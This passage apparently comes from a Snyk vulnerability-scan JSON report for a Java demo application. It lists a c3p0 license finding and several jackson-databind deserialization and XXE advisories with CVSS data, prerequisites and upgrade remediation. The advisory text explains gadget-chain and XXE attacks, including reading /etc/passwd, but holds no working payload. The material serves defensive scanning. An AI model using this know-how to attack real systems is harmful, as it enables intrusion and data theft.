"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "high" + }, + { + "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "type": "license", + "title": "LGPL-3.0 license", + "semver": { + "vulnerable": [ + "[0,)" + ] + }, + "license": "LGPL-3.0", + "language": "java", + "description": "LGPL-3.0 license", + "packageName": "c3p0:c3p0", + "creationTime": "2024-06-18T02:35:42.971Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:35:42.971Z", + "severity": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2798", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.263794Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.pastdev.httpcomponents.configuration.JndiConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2798)\n", + "epssDetails": { + "percentile": "0.77013", + "probability": "0.00519", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24750" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-09-18T13:46:28.613692Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-18T13:44:12Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-09-18T16:19:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.721313Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Srikanth Ramu", + "threedr3am'follower" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2658", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/2864%23issuecomment-701026600", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:44.942188Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to the class `ignite-jta`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2658)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/2864#issuecomment-701026600)\n", + "epssDetails": { + "percentile": "0.75677", + "probability": "0.00464", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10650" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-11-29T12:43:11.601162Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-29T22:30:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-11-29T15:58:07.317638Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:55.201119Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "credit": [ + "Bartosz Baranowski" + ], + "semver": { + "vulnerable": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.4", + "2.9.10.7", + "2.10.5.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ext/DOMSerializer.java", + "className": "DOMSerializer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2589", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887664", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "cvssV3BaseScore": 5.8, + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:50:46.628614Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:31.367594Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 5.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:46.628614Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. A flaw was found in FasterXML Jackson Databind, where it does not have entity expansion secured properly in the `DOMDeserializer` class. The highest threat from this vulnerability is data integrity.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.7, 2.10.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2589)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1887664)\n", + "epssDetails": { + "percentile": "0.68432", + "probability": "0.00275", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25649" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-288c-cq4h-88gq" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-04T11:58:40.054903Z", + "functions_new": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ext.DOMSerializer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-04T11:54:03Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-04T15:22:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.249736Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:42.491903Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35490" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:37:26.422837Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:32:48Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:26.923105Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:57.453912Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.762302Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:57.453912Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that 